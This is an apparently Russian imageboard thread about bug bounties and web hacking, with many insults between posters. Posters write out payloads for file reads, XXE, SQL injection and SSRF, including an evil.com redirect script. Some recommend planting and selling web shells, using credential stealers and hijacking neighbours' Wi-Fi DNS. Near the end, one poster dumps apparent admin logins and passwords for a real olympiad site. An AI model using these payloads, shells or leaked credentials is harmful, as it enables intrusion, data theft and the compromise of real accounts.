>>144875623тест провален,продолжать нет смысла. Теперь я тебе разрешаю назвать свой носок женским именем засунуть в него свой хуй, разбудить мамку и показать ей как ты класно умеешь. ответ на первый вопрос:php://filter/convert.base64-encode/resource=%file.php%Ответ на второй:LOAD DATA LOCAL INFILE '%file%' INTO TABLE test FIELDS TERMINATED BY '\n'Всего хорошего сладенький. Рассказывай теперь своим друзьям какой ты хакер тут ты уже зашкварился.
>>144875804Феликс, аватарку забыл одеть.Гормоны сегодня принял?
>>144875804>>144875804>php://filter/convert.base64-encode/resource=%file.php%Как там в 2011?>LOAD DATA LOCAL INFILE '%file%' INTO TABLE test FIELDS TERMINATED BY '\n'>Я СКОЗАЛ load_file НЕ КАТИТ ТОЛЬКО КАК Я НАПИШУЯсно, скрипткид.Как там metasploit, норм настроил?
>>144875902Додс load_file не работает если file_priv=N О чем мне с тобой дальше разговаривать? Ты сейчас попытался реабилитироваться, назвал меня скрипткидом, упомянул метасплоит, хорошо хоть это знаешь. Зашкварился повторно. Спокойной ночи анончики. Пусть вам приснятся дампы гигабайтные и шеллы траффистые.
блять, так и вижу как даун пишет админу "дяденька, у меня хакерские штуки, которые я на хакер.ру не работают,Ю вы можете php.ini настроить? а? что? у вас не php, а как у вас сайт арботает? .net? что"
>>144875996>Додс load_file не работает если file_priv=N >О чем мне с тобой дальше разговаривать?>Мне нехую сказать, поэтому я напишу, что я шарю а ты нет без пруфов, вотУебывай и говно свое забери, скрипткид.>Ты сейчас попытался реабилитироваться, назвал меня скрипткидомНу да, это ты накидал тут список говноПО тому шо ТЫ ХАКИР вот такой, без говноПО никуда, а я пытаюсь реабилитироваться, ага.щенок блять
>>144876083расскажи за труПОмимоанон
>>144876083Конченый я накидал мануал как начать с этим говно по (и указал лично что это зуита) и увидеть профит не влипая сутками в мануалы и документацию. Также если ты конченый вырубишь свою выборочную слепоту ты увидишь что я написал что можно начать с этого а потом почитать статью и научится крутить руками. Линк и пруфы выше. Всех благ. Надеюсь это у тебя излечимо.
>>144876083ну или свою позицию изложи. было бы интересно
>>144872442Дык сразу набежали бы, мол >кококо рекламареклама репооорт
>>144875302>>144876327или ты пиздабол?Помойму тут все ясно, свиду это типичная прыщеблядь. Изза упоминания дотнэта делаю вывод что это разраб на .net а не хацкер. Противоречащие выводы, но всёже.
>>144876752Да нахуй мне скрипткиду что-то пояснять? Ты же кроме программ и пару протухших 2009 блять год этой хуйни!!!мануалов нихуя не знаешь.
>>144876876Слит, диванный.
>>144876907Ясно.
>>144876923Понятно.
>>144876937Иди гугли как там сервера на php 5.2 ломать, будь на острие, как говорится.
>>144876962Нахуй ты мне отвечаешь?
>>144876979Семен, плис.
>>144876876 ок го по свежаку пробежимся! Просто думал такое старое гавно (ну тоесть классику на самом деле) все знают.Как эксплуатировать XXE когда WAF реагирует на SYSTEM?Как посылать POST запросы через SSRF во внутреннюю сеть?Как эксплуатировать mysql инъекцию в лимит после oрдер бай?
>>144876987Под кроватью Семена не нашел, шизик?
>>144871522> топовый_вузМФТN???????????????
>>144877054>свежаку >XXE >свежаку >POST запросы через SSRF>свежаку >mysql инъекцию в лимит после oрдер бай>свежаку Что еще спизданешь?
>>144877147Вот серьезно, я просто проорал сейчас. Это просто пиздец блять. Ты сайты вида "васян_пердун_2006" ХАКИЕШЬ, ХАЦКОР?
>>144871522Поверь в этой сфере 30к платят только стажерам на пол ставки.
>>144877175блять, такой норм был тред про баунти, пока скрипткид со своим говном не прибежал.Ты сука наглядный пример деградации веб-защиты(блять, слово вылетело из головы,но ты понял).
>>144877147Слишком толсто.Может сам хоть что-нибудь спизданешь или ты всего лишь врунишка?
>>144877175РАУНД!Ну давай оправдывайся. Слушаю. Мб хоть чтото из этого пердуновского (дай бог 14г) знаешь?
>>144877054>XXE когда WAF реагирует на SYSTEMЯ не он, но, например<!DOCTYPE :_-_: SYSTEM "ftp://lol.com/">или
>>144877283или<!DOCTYPE {0xdfbf} SYSTEM
>>144877200Веб защиты хахахаха. Дядя я в офенсиве(если ты понимаешь о чем я) уже не первый год. А твои термины "веб защита" похожи на кафедру програмистов в шараге.
>>144877283Отвектор артсплоита, но нет. Я имел ваиду public))
>>144877054>Как эксплуатировать mysql инъекцию в лимит после oрдер бай?Через PROCEDURE ANALYSE
>>144877325Ахуенно. Доебался до слов. Причем я даже написал, что слово из головы вылетело.Я не знаю, где ты там первый год, но я более чем уверен, что вместо изучения технологий ты читаешь статейки античата.Блять, да ты же скрипткид, что ты мне втираешь блять?К слову, я людей с античата еще году в 2006 в хакерском закрытом канале в ирце нахуй послал, тк уебки ниначто не способные, такие же как ты, там были изначально.И еще, если ты знаешь пару старинных вещей и пытаешься этим кого-то подловить, тк подобного дохуя и больше - то ты просто уебок. Это тебе таК, на будущее.
>>144877054>Как посылать POST запросы через SSRF во внутреннюю сеть?А это хуй знает, обычно для подтверждения баги хватает обычный векторов. Но просвяти.
>>144869013 (OP)Годный тредмимоцтфник
>>144877524Был годным, пока скрипткид не пришел и не обосрался на весь тред.
>>144877404Верно!>>144877477Смотри в сторону gopher://
>>144877472Напиши уже хоть что-нибудь, что могло бы запруфать твою "профессиональность", а то выглядишь пустословом. И не надо кукарекать про то, что "доказывать что-то чушкам с двоща" тебе лень.
>>144873795Он наверно имеет ввиду компьютерную программу. То что у тебя на пикче - типичнейшая дыра, наверно дохуя софта, которая может в поиск такой уязвимости, не? То есть ручками работать не надо будет, запустил программу на ночь, а утром уже посмотрел результаты.
>>144877524Какая тима если не секрет?
>>144877588> То есть ручками работать не надо будет, запустил программу на ночь, а утром уже посмотрел результаты.Блять, и тебя он заразил.
>>144877524Есть скрипта, в одном флаги точеные, в другом флаги дроченые. Куда фаззить пойдешь, куда реверсить?
>>144877592Большая и сильнаятоп 5 цтфтайм
>>144877555А, ну это ты про суть обойти защиту, если атакуемый сервак режет определенные порты. Если яправильно понял, то подойдет ещеftp://sftp://dict://и dns запросы.Правильно?
>>144877575Чем тебе пруфать? Или мне тоже спросить какую-то паблик хуйню, которая гуглится за 2 секунды? Или про "уязвимость" 10 летней давности спросить, про которую ты слышать не слышал, тк осталась она только на серверах Васянов?
>>144877575Бро да он уже трижды слит, пусть кукарекает. Аноны сами видят кто лев толстой...
>>144877678найс самоподсос.
>>144869013 (OP)Все популярные ресурсы проверены на дыры вдоль и поперёк кучей желающих, вероятность найти хоть что-то крайне мала, не?
>>144877717Не.99% - скрипткиды, которые сканят фейсбуки всякой псевдо-хакерской парашей.Куча всего есть.Даже аноны с харкача бабло с ВК получали, например, причем относительно недавно.
Эй, хакеры, а вы пизду хоть раз вживую видели?
>>144877717Идешь на hackerone.com в раздел hacktivity и видишь, что каждый день выплачивают кучу денег за репорты на самых популярных сайтах.
>>144877617Я по стеганографии и крипте вообще
>>144877663Неткат врубаешь и фаззиш порты. Мне так думается, не разу не встречал. Про днс да верно чекаю бурповским колаборатором сначала наличие запрсиков от бажной приложухи а потом пытаюсь читать файлы. Ftp:// по каефу позволяет читать директории в java есть тулзень для этого поднимает сервачок и логирует все. Сорян скинуть не могу не помню как называется
>>144877774Да, когда твоя мать свою раздолбанную мандень на вебку крутила.
>>144877774Так тут успешные же все. Все 20+, состоятельные, даже если задроты, то денег на шлюху точно хватит.
>>144877818По вебке это не вживую, даун девственник.
>>144877811Ты хакаешь сервак, когда у тебя к нему полный доступ есть, да?
>>144877617Кробабасы подъехали фаззить буду там где не задрочено авось чо и нафаззею а там где заточено позову кореша реверсить ято кавычкодав и скрипткиддес (мне так сказали)
>>144877829А кто сказал, что по вебке смотрел?
>>144877869>на вебку крутила.
Предлагаю на ночном завтра этот тред пересозать и померяться писюнами, надеюсь скрипткид не будет кукарекать снова, показывая он ебантяй и не рассмешит уважаемых людей.
>>144877933Не знаниея бородатых паблик фишек, а рили достижениями.
>>144877933 друг это слишком толсто, ну как ты не поймешь?
>>144877988Что толсто, еблан? Ты никакой свой вклад в сообщество показать не сможешь? Хотя бы 1 раз денежек за хакцорство получал?
>>144877893Но я то рядом стоял.
>>144877933А чем меряться то? Успешными репортами? Так я вот предполагаю, что ты типа из какого-нибудь ptsecurity, у тебя по любому и опыта больше и репортов, если это ты про офенсив говорил, я же самоучка например, и звезд с неба не хватаю, но гуглить и изучать что-то новое, чтобы проэксплуатировать при случае, смогу.
>>144878021 да получал. Деанонится не буду тут мои коллеги могут почитывать. Ах да, я ежемесячно получаю за это, ну за последние 3 месяца вышло где 2кк
>>144878046Хактивити - это же не только хакеруан или подобные площадки. Можно и что-нить другое показать.Мне вот интересно достижения других людей посмотреть.
>>144878046поверь, он не оттуда)))
>>144878127yarbabin, залогиньтесь.
>>144878046Там эту древнюю хуйню(выше) на собеседовании спрашивают уххахахаххах
>>144878166>>144878166Типикал скрипткид.
>>144878205Когда-нибудь, может быть, ты поймешь, что главное это не заучить старинную парашу, а понимать как/что работает.Это отличает меня от тебя.
>>144878325а как что работает?
>>144878353Ну вот ты выше заученные вопросы задавал, на которые ты знаешь заученные ответы.Но если тебя спросят "почему" - ты же обосрешься, ничего кроме "нуу эээ нуу" сказать не сможешь.
>>144878353 он работает за копейки и несет хуйню, я зарабатываю шесть-семь его годовых окладов и пытаюсь понять нахуй он ее несет
>>144878455>он работает за копейки и несет хуйнюТЫ скозал?
>>144878436Бля жду вопрос
>>144878489Жопой читаешь? Выше были вопросы/ответы. А объяснить сами процессы скрипткид не может, зато пытается доказать на анонимной доске, что он тут получает больше всех, знать не зная чужие доходы.
>>144878455Ну сколько щас провинциальные кодеры на дотнете получают 500-600$ в месяц?
>>144878519зато он меняет пароль раз в три месяца, и в нем есть цифры и спецсимволы.
>>144878515Выбирай любой из вопросов я обьясню Я думал ты чтото от себя сможешь сказать ну тыже хакер, олдфаг ебать. В 6ом школоту смачата в irc щемил
>>144878515Такто я вайтбокс тоже могу(если ты понимаешь о чем я) тыже хакер
>>144878519>Ну сколько щас провинциальные кодеры на дотнете получают 500-600$ в месяц?Куда мне до таких высот. Я работяга обычный.>дотнет>сам придумал, сам раздувает>скрипткид пиздабол>классика
>>144878718Вопросы будут или тебе помочь сформулировать?
Ебануться. Это тред с петухами 300к/сек
>>144878757Ты клея обпыхался чтоли? Какие нахуй вопросы ? Вопросы/ответы были у скрипткида, я ему заметил, что полезно не заучивать вопросы/ответ, а полезно знать саму суть процессов/технологий, что и как работает, что из чего следует, почему происходит одно, а не другое. Понимание сути лучше, чем заученная хуйня.Вот как думаешь, скрипткид знает, что такое модель OSI и нахуй её вообще знать? Вот где нужно начинать, а не с перечня программ уровня xspider(или как там назывался МЕГА СКАНЕР УЯЗВИОМСТЕЙ)
>>144878855не с петухами, а со специалистами в области информационной безопасности.
Тред хорош.Пол года назад хотел вкатится в хаккерство. Хотел ставить на рандом вай-фай днс пересылку, на сайт с заражением системы на майнинг или просто пиздить инфу(куки, пароли и тд). Ходишь по городу с ноутом(или малиной, хотел её взять, чтоб сразу сломать если запалят), ломаешь вайфай с помощью брута(можно пересылать хэнды на комп с мощной видяхой, что я и хотел сделать), ну а дальше днс ставить и всеКороче вопрос у вас, это было все реально сделать? А то я только коплю на малину, а ноут большой и громоздкий.
>>144878860а какое отношение модель osi имеет к реально существующему интернету.
>>144878860Братан модель оси и ее ебаные уровни нахуй не нужны в веб хакинге, яж говорил это не твой тред. Я тебе могу разжевать за любой баг в вебе про сети плз создай отдельный тред. И там вспоминай метасплоит и xspider(который умер в нулевых кстати)
>>144878903Побойся бога, тут же белые шляпы онли.
>>144878928Если ты хацкор уровня вставить кавычку, то никакой.>Я тебе могу разжевать за любой баг в вебеНу ясно.
>>144878903Ну по городу не стоит, долби соседей подрубайся к вайфаю, тыкай их роутеры(часто дефолтные пароли или вообще ничего). В них можно свой днс пихать в настройках.Это не секундное дело чтоб по городу ходить, придется оселать постоянно.Врядли кто спалит. На вопрос со делаешь скажи игру для телефона пишу. Поугорают и кйдут
>>144878991А ты мне за модель оси разжевать решил ну это ебать по хакерски!В шараге наверно заебали с ней да? В жизни то хоть пригодилось?
>>144878928>И там вспоминай метасплоит и xspider(который умер в нулевых кстати)Нахуй ты кстати мне мои же слова, адресованные скрипткиду, повторяешь?
>>144878928а какой твой любимый плагин к ida?
>>144869013 (OP)Очень интересный тред, ОП. Я сам баловался, с sql инъекцмями, но это лет 8 назад было, сейчас они уже не особо актуальны.А кто еще, кроме гугла и фейсбука практикует выплаты за найденные уязвимсоти? Как вообще происходит общение после того, как она найдена? Куда выплачивают? Нужно ли платить налог россии?
>>144879034>А ты мне за модель оси разжевать решил ну это ебать по хакерски!Ты либо обиженка-скрипткид, либо просто жопой читаешь. Перечитай еще раз пост, где я упоминал модель.
>>144879006Соседей на изи. Даже без брута. У них стандарт пароли типа "12345678", "password" и тд.Ну если засунуть малину в рюкзак, с припаяной батарейкой, чтобы часа 4 держала заряд, то можно и спокойно стоять и курить, пока ловятся хэши.
Скрипт и мегамозг, который все баги всех систем знает спать ушли. Вместе.
>>144878991Я вставляю кавычку, это портит синтаксис sql запроса (если там инъекция), изза того что юзеринпут не фильтруется должным образом. В зависимости от субд, типа запроса и места моего внедрения в запрос можно будет крутить эту инъекцию разными способами. А модель оси тут куда приписать? Точто яп обращается к базе данных по ее протоколу, сервер базы данных принимает сообщение на физический уровень и оно передается выше? Нахуй это тут?
>>144879095Я понял ты решил уже хоть чтото спиздануть под конец не в попад. Поздравляю это твоя первая победа.
>>144879208>Я вставляю кавычку, это портит синтаксис sql запросаТы таким образом мог Васянов в 2006 ломать, но не проекты с хакеруаныв 2017. Уебывай.А модель была мной озвучена как пример того, что нужно изучать процессы, а не заучивать мертвые баги старинных систем.
ЩАс же мамкины хакеры побегут качать сик'юэль инджекшн, и половят дохуя вирусняков.Или же сломают винду установкой кали.
>>144879269Я хспайдер и метасплоит привел в пример скрипткиду, чтобы напомнить ему, что он скрипткид, то есть не человек, а животное, которое нихуя не понимает, просто берет непонятную ему парашу и использует её.Нахуй ты встрял в разговор, если не понимаешь о чем шла речь - непонятно. То есть либо ты как раз тот скрипткид, который обиделся и поэтому орет, что знать нихуя не нужно, либо ты просто долбоеб, который как раз-таки сам спизданул не в попад.
>>144879313ну а что ж ему, самому 0day сидеть искать.
>>144878872Как тебе угодно, петух
>>144879272 бля какойже ты ущербный даун. Ты вообще не понимаешь что ты несешь.https://hackerone.com/reports/23098https://hackerone.com/reports/12583https://hackerone.com/reports/115748Да таких багов нет на х1. Только у васянов. Скинул бы свои репорты но деанонится изза какогото окологика нищеброда втирающего про модель оси в треде про хакинг не хочу.
>>144879359Ну а почему бы нет? Ты же >Я тебе могу разжевать за любой баг в вебе
К вопросу о том, откуда берутся баги. Наверняка эта форма в письме не валидировала входящие данные.
>>144879359Это только звучит круто. Найти дело 5 минут другое дело что продукт будет малоизвестный.
>>144869658Мамин какер сдеанонился за 10 постов, лол.
>>144879388>привел в пример сайты ВасяновЯсно.
>>144879388>Скинул бы свои репортыБлять, ору.БЫ БЫ БЫ БЫ БЫ БЫ
>>144879388ты случаем не пекафэт? видел их переписку по хакеруану, он особенно часто выдавал подобные перлы как и ты "блять, я бы показал сколько я нашел багов, да деанонится боюсь, но блять верьте на слово я суперхакир, имею по 300к/сек без пруфов"
>>144879396Всего хорошего. Обмажься моделью оси и своей бумажкой из шараги. Про носок не забудь. Ахда напомнюС чего все началось ты сказал что ты хакер и в теме пиздец давно но не знаешь основ(это старая хуета). Оказалось что ты пиздабол. Кодер, учился в шараге (в вузе). Скорее всего пишешь на .нет . Ничего толком дельного сказать не смог только кидался говном. Я то увернулся но ты сам измазался пока кидался. Былаб это не анонимная борда над тобой бы еще долго потешались.
>>144879471Честно мне похуй веришь ты или нет.
Знатоки, дайте совет пожалуйстаУчусь сейчас на погромиста в европке. Первый курс. Через пол года надо выбирать специализацию и ее дрочить еще три года, на выбор есть: Software Engineering Smart Systems Mobile Solutions IoT and Cloud Computing Что бы вы порекомендовали? Алсо, что бы по быстрому вкатиться в айти сферу и все таки начать зарабатывать деньги, начал учить андроид дев. Все правильно делаю?спасибо
>>144879547ты б хоть программу курсов почитал.
>>144879524>Всего хорошего>Ой, всёЯсно.
>>144879547>деньгикопейки
>>144879547похапэ - проще вкатиться и ваканский больше.
>>144879547Мне кажется, что идет уже переполнение этих андроид специалистов. + это нахуй не нужно.4 по мне интересно, что сейчас все интернет вещи набирают оборот + стартап сможешь замутить какой нить. Типа умный носок работающий на твоем поте, и конектится к твоему смартфону и показывает насколько воняет твой носок, чтоб кинуть той шкуре в лицо.Самому тоже надо делать выбор, но учусь в рашке. Думаю таки на ИБ. Погромист хуже пидораса. или червя-пидора, но это php-шники
Скрипткиддисы, когда находится время на поиск багов? После работы? Или с мамками живете и вам работать не нужно? Или только поиск багов? А вдруг нихуя не найдете, как платить за жилье и прочее?
>>144879610>>144879711Спасибо, поцоны. Думаете стоит забросить ведро и начать пхп? А то я аж целую неделю учусь, могу и бросить
>>144879388Лол, проиграл с репортов, особенного первого, как imgur развели на 2к, указал ещё Remote Code Execution, высер с гопхером который БОЖЕЖ ТЫ МОЖЕТ ПОДКЛЮЧИТСЯ К SMTP и ОТПРАВИТЬ ПИСЬМО, больше половины хакероне состоит из убеждений вендора в КРИТИЧНОСТИ РЕПОРТА, всякими теоретическими высерами.
>>144879911просто ты жадный.
>>144879911 заблуждение. Там не дауны сидят и принимают баги. Их задача заплатить тебе минимально, не нарушая правил программы. Бывает что они сами обьясняют критичность
>>144880066>заблуждениетолько кукарекнуть можешь или противопоставишь что-либо тексту, скрипткид?
>>144879804Ну в пхп вкатиться гораздо проще, и ваканский в разы(в сотни раз даже наверное) больше, а дальше - думай сам. А если сравнивать уже сеньеоров - то может андроид и выйграет, то опять же вакансия нужна, скилы. Да и нахуй тебе это задротство, когда ты сеньеором станешь, не в 23 же года.
>>144880066Конкретно в данном случае вендора развели теоретикой, и практикой которая на 100 баксов тянет, и напугами вбросив пару CVE - а как они реализуются эти CVE уже ума не надо - главное убедить и напугать.Вот если бы реализовал, хотябы на примере POC'а не добивая до конца RCE - тогда и заслуга. ОколоХССных даунов там больше половины, а специалистов которые реализовывают сложные векторы добивая по типу с порнхабом - единицы.
>>144880255>ОколоХССныхТы сейчас скрипткидов и кавычкадавов треда обосрал низахуй. Знания специалистов для чуханов. Нормальный скрипткид знает 3 старых бага и 2 старых тактики.
>>144879547Неправильно, куда-то бы там не вкатывался, дрочи кресты.
Раз уж здесь весь цвет ptsecurity собрался, объясните на пальцах, как burp collaborator отлавливает dns запросы. Или как вообще сделать dns запрос и отловить на своей стороне при ssrf.То есть я не силен в ssrf, но могу реализовать при случае так.Допустим есть уязвимый урл http://lol.com?url=Я делаю так http://lol.com?url=http://evil.com/ssrf.php, где evil.com контролирую, ессно, я а ssrf.php cодержит что-то типа <?php header("Location: http://мой_сервак:12345/"); ?>Ну и смотрю логи. А как сделать/отловить dns запрос?
>>144880445Не совсем тебя понял, если раскрыть DNS, https://thesprawl.org/projects/dnschef/
>>144880445скрипткид дальше кавычкодавста да запуска протухшего ПО не могет.Если 2ой выебщик нихуя не напишет, а он не напишет, потому что выебщик, то я тебе чуть попозже распишу.
>>144880553Ну вот, смотри, недавни нашумевший баг.https://habrahabr.ru/post/319676/>Ок. Это действительно случается довольно часто, когда компания блокирует обычные http-запросы, но не блокирует запросы DNS. Что ж, попробуем другой пэйлоад:Там все мне понятно кроме одного, как именно чувак обошел dns-запросом фаервол и отловил его на своей стороне? Что для этого нужно, кроме самого сервака, который ведет логи таких запросов.
>>144880553Алсо, спасибо за ссылку, интересная штука. Завтра(уже сегодня) внимательно изучу.
>>144869013 (OP)Спасибо за тред, ОП. Ты - молодец, мало кто будет делиться такой инфой, вроде бы она и не приватная, но вот так разжевывать все для анона - просто подарок, который больше половины треда здесь не оценят. Воннаби войтохед в треде. По молодости очень хотел вкатиться в реверсинг, какие-то простые кряки даже получались, редактировал ресурсы, менял OEP, обходил блоки проверки регистрации... только вот уже все почти забыл нахрен, да и инструменты те, наверное, уже устарели. Юзал HVIEW - ломаный/реганый подгонял старший товарищ (настоящий профи, знаменит на сцене), да и все остальные тулзы тоже он давал, не учил только особо, говорил всегда - учи АСМ, там разберешься. Ах да, протекторы худо-бедно снимал. Сейчас уже, наверное, не смогу восстановил ни одну таблицу импорта.
>>144880901Максим?
>>144880559С удовольствием прочитаю, если распишешь, только прочитаю уже завтра, лол, засыпаю пиздец. Заранее спасибо за разъяснения.
>>144870270а в чем заключается конкретно эта уязвимость на яндексе?
>>144881171Нет, не Максим.
>>144881171Лол, я Максим который подходит под описание
Нашел баг в интерфейсе гугла@Дали $10к@Нашел орфографическую ошибку на сайте касперского@Дали 10 лет в колонии поселения и штраф $10к
>>144881661С русскими связываться не стал бы. Те скорее на сгуху отправят, чем денег заплатят.
>>144871780которая подруга Боба?
Фейсбук, Гугл - а кто еще заплатит, если найдешь багу? Например, нашел дырку на сайте какой-нибудь фирмы забугорной, у которой само собой нет никаких программ поиска багов, это просто корпоративный сайт. Никто ж не заплатит за такое. Надо вести будет переговоры с начальством фирмы?
>>144881900>Никто ж не заплатит за такое.продай в даркнете
>>144881900Да, и скорее всего тебя пошлют на хуй.Очень много ушлых.Я как-то нашел баг в одной известной российской сети. Позвонил, админ попросил показать, я показал, админ отследил и закрыл багу, меня послали на хуй.С забугорными тоже самое, всем похуй на баги.Самое простое и прибыльное - заливать шеллы и продавать.
>>144881952что означает "заливать шелл"?мимо-даун
>>144881952Ну есть сайт pisya.ru, ты, хацкор, заливаешь файл туда pisya.ru/images/file.phpОткрыв эту ссылку, ты увидишь что-то типо пикрила.Покупатель по итогу сможешь заливать какие-то свои файлы(или править их файлы, вставляя рекламу порнухи, н-р) и тд
>>144882004->>>144882059
>>144882059Какие сейчас шеллы в ходу? Я раньше c99 заливал.
>>144882112wso
>>144882112антивирусы ща палят все за нехуй делать, мне кажется проще что-то свое небольшое напсать.
>>144882128Хуй, надо уметь просто
>>144882137Ну если ты правишь шелл - то это тоже самое, что самому писать. А так - др. веб, н-р, все шеллы палит известные.
>>144882150Закриптованные там в base64 хотябы тоже палятся?
>>144882150Банально ксорнуть а код получать с пастбинаЯ стеганографически прятал
>>144882170Ну я что пробовал - всё палил, там понятное дело всё шифровали.>>144882174Ну это тоже заебись придумал, может и прокатит такое.
А если я околовебдев, стоит ли вкатываться в такое?Да и с современным вебом - такое уже слабо катит, нет?И как вообще вкатиться?
Телеграм/KrobaKingdom
>>144882112P.A.S
>>144869013 (OP)>Бумажным безопасникам, которые ололо составляют "матрицы угроз", ковыряются в ГОСТах, чтобы написать очередную должностную инструкцию, которая нахуй никому не нужна и остальное время устанавливающие антивирусы на рабочих местахСобираюсь стать именно таким безопасником. Какие подводные камни?
>>144886772Тебе будут ссать на лицо практические безопасники.
>>144886978Да и похуй как-то. Деньги неплохиено не 5к$/баг, конечно, работа - не бей лежачего большую часть времени.
Ну бля, такой тред проспал...Не сливайте баги на хакерван.
>>144869658тебе можно писать на lalka.bugbounter@yandex.ru?Нужно знать языки программирования? А если я ноль вообще, но люблю втыкать и искать всякие дыры (в играх например)?
>>144869013 (OP)>Черные шляпы првиетствуютсяВ МЕСТЕ МЫ СИЛА
>>144887461>если я ноль вообщеНе пиши. При шеллкодировании сплоента надо избегуть нолей, ибо они терминируют asciiz строку.
>>144880901>Юзал HVIEW>протекторы худо-бедно снималА дворды в уме ксорил?
>>144873873inurlbr, епта, хавидж блять..
>>144888196Для тренировки пойдет. у и понтануться в школе можно.
>>144888196>2017>Искать скули по доркам>Да ещё и юзая Havij
Ебал я твой hackerone, ОП. Ебал в рот и в жопу. Там бывает так, что у программы нуль репортов, а твой баг всё равно объявят уже найденым. В пизду. Сажи вайтхетам.
Получилось!Пойду забирать бабло.
ап
>>144889691еще работает, епта, давайте набигайте в Телеграм конфочка @KrobaKingdom
>>144890642>Телеграмлол
могу ли я за ета денги получить
Всегда радуют коментарии подтянувшихся теоретиков. Годный тред в череде рулеток и вебмок, я далек от тематики но почитать интересно. Спасибо ОП
Лол, ебучая лента на харкаче контент фармит.
>>144892680wut?
Кто не с нами - тот под намиКроба
>>144880559Ты все некак не уймешся? Крутой поцан по кличке жопа? Ахуенный хакер спиздил хуй и спрятал в жопе? Что ты сделал для тредика? Что ты сделал для того чтоб одептам было интересно? Лох гавно и не пацан, ору с тебя
>>144893273А.У.Е. братишка, кробословляю тебя на кробоугодную деятельность! Во имя святой кавычки и скобки! Кробминь! @KrobaKingdom
Может есть уютная конфочка для уютных хакерманов?
>>144894085@KrobaKingdom
>>144894951А сервер какой? jabber.ru?
>>144895052Телеграм, ёпт.
>>144895052ето телеграф конфа! у Telegram есть веб версия (еси чо она ни на тор, ни на впн не ругается)
>>144892703Открываю ленту, а тамhttps://lenta.ru/news/2017/01/20/thankshacker/ Лол, открываю харкач а тут это (где-то в треде упоминался этот случай)
>>144895277Так ссылку дай.
>>144895438@KrobaKingdom в поиске телеграма набери
>>144895503Ты шутишь что ли?>Please choose your country and enter your full phone number.Может еще скан паспорта приложаит, а, майор?
>>144895700Major Laser одобряе. На sms-reg.ru купи акк или симку друга\брата\мамки возьми, ну чо ты
>>144869389Я хекал в 2006-м, недавно попробовал - это пиздец.Хуй что найдёшь, везде всё анально экранировано, даже если есть где-то, то какой-нибудь блайнд.Баги выглядят очень легко >>144869658 НУ ОЧЕВИДНО ЖЕ БЫЛО ТУДА ПОДСТАВИТЬ скрипт.алерт , но стоит самому сесть искать - это какая-то бездонная пропасть - можно просто двое суток сидеть и НИЧЕГО не найти. Всё везде надёжно экранировано. Как быть, что делать-то?
>>144896415Не всё безнадёжно экранировано. Помимо инъекций, хсс - есть ещё уйма уязвимостей и с каждым днём их становится всё больше и больше.
Схороните тред. Буду становиться успешным человеком. Завтра.
Вот смотри оп, или чуваки с иб конфочек. Если я буду натравливать [bold]ACUNETIX[/bold], мне дадут пиздюлей или все норм, т.к. участвует сайт в багбаунти?
>>144896930Тоже подумал об этом.Лол.
>>144891442Админ там унылый пидор, он даже те баги, которые я ему бесплатно палил, не фиксил.Хз, попытай удачу мб.
>>144896242>купи аккНа что только не готовы долбоебы, лишь бы жаббером не пользоваться.
>>144896415>Хуй что найдёшь, везде всё анально экранировано, даже если есть где-то, то какой-нибудь блайнд.Не надо пиздеть.За эту неделю слил базу магазина и сайта знакомств c проститутками через sql-inj.
>>144898997Как защищаешься в процессе? Соксы, впны, еще что?
Ответьте мне на мой вопрос >>144897052И за блайнды или досчерезХХЕ грошей же не дадут?
>>144899285впн+тор вполне хватает>>144899390>за блайнды или досчерезХХЕ грошей же не дадут?Вот за это дадут. Блайндом и ХХЕ можно увести базу как два пальца.
>>144899541> за это дадут. Блайндом и ХХЕ можно увести базу как два палБля, сурьезна за блайнд заплотють? таймбэйсд или похуй какой?А вот если именно дос по ХХЕ? И что по поводу акунетиксов или ларрилау(а то вдруг чо пропущу), не взбугуртят о сканере?
>>144899769Эти сканнеры юзает каждый мамкин-багхантер (ну или бурп). Все инъекции входят в топ owasp 10 и являются критичными. Посему заплатят.
>>144899839Если конечно место, где ты нашёл, входит в скоуп.
>>144898997У меня был заказ. Нужно было ломать какие-то уже взломанные друпалы.Протыкал все ебучие модули, все паблик эксплоиты протыкал, нихуя не вышло. Причём там ошибка должна была быть уровня получения админки, ибо нужно было в сам код вписать ссылку.Из 30 сайтов - я не нашёл НИХУЯ. Подумал, что или их ломали взломав их хостинг, или они сами продавали ссылки таким образом. Раньше как-то получалось. Находил и в модулях разных уязвимости, и XSS скармливал, и потом рутал.Или я отупел, или хуй знает.Какие-то уязвимости совсем другие сейчас. Что почитать можно?
>>144898848сидели бы эти все долбаебы в жаббере, телеграм бы был нинужын.
Сдал баг в vos.olimpiada.ru, починили, не ответили. Обидно, блядь.Суть: задания доступны по "$link/2014_2015". Даешь 2014_AVGSD - хавает, дает за 2014/2015, ссылка на следующий год - "$link/AVGSD_".ЖС втыкать не пробовал, но могло и пройти. Сейчас выдает 404 нп некорректные годы, лол, они статические сделали?
>>144899953Да всё те же уязвимости. Просто сейчас index.php?id= практически все прикрыты из-за популярности. Но остается rest и ajax.Ну а друпалы и прочие популярные штуки только через плагины или слить стилером пароль от хостинга
>>144900311>остается rest и ajax.Понятно, спасибо.Про друпалы тоже уже понял, что через плагины.> слить стилером пароль от хостингаПоясни, это как?
>>144900407Ну это на школофорумы "куплю криптованый стилер/продам крипт стилеров, гарантия 100%"Т.е. троянчик засылается человеку и грабит его пароли.Не факт что он его запустит или АВ его не заблочит, но тема до сих пор популярная.
>>144893591побольше тебя сделал
>>144899839>Эти сканнеры юзает каждый мамкин-багхантерскрипткидди, плис.
>>144900131>Сдал баг в vos.olimpiada.ru, починили, не ответили. Обидно, блядь.Хуй знает что они там починили.+ как пруф тем, кто говорит что sql-inj не осталось в 2к17
А поясните тупому. Те пароли что браузер запоминает он хранит в открытом виде или максимум щифрует и все?
>>144901992Опера в ванде хранила, сейчас все все шифруют вроде
>>144901953это чем просканил?
>>144901953KJKТу парашу с годами хоть закрыли.
>>144902244> sqlmap resumed*> чем
>>144902165Но ведь ключ для шифрования где-то же лежит. Я к тому что я не настоящий сварщик, но перехват ключа и дешифровка на поверхности , нет?
>>144902284я ни хакир прост, мимоанон.
Держите, спортсмены:vos.olimpiada.ru/Admin/vitar:rativAnka:lenochkajulia:pd52a2eoleg-dja:12345Shurka:p0dvAloCSKAo:12345mbudrevich:vfntvfnbrf
>>144902627Что, авторизовался без прокси, петух, теперь решил замарать анончиков других?Говен поешь.
>>144902333Как ты ключ хочешь перехватить? Браузер может загрузить все до открытия страниц при запуске и расшифровать gpg ключом с паролем, например.
>>144902627adm@mccme.ru, если хочешь.
>>144902680>2k17>прокси
>>144902815Но зачем? Пусть деньги у себя оставят, я не вымогатель.
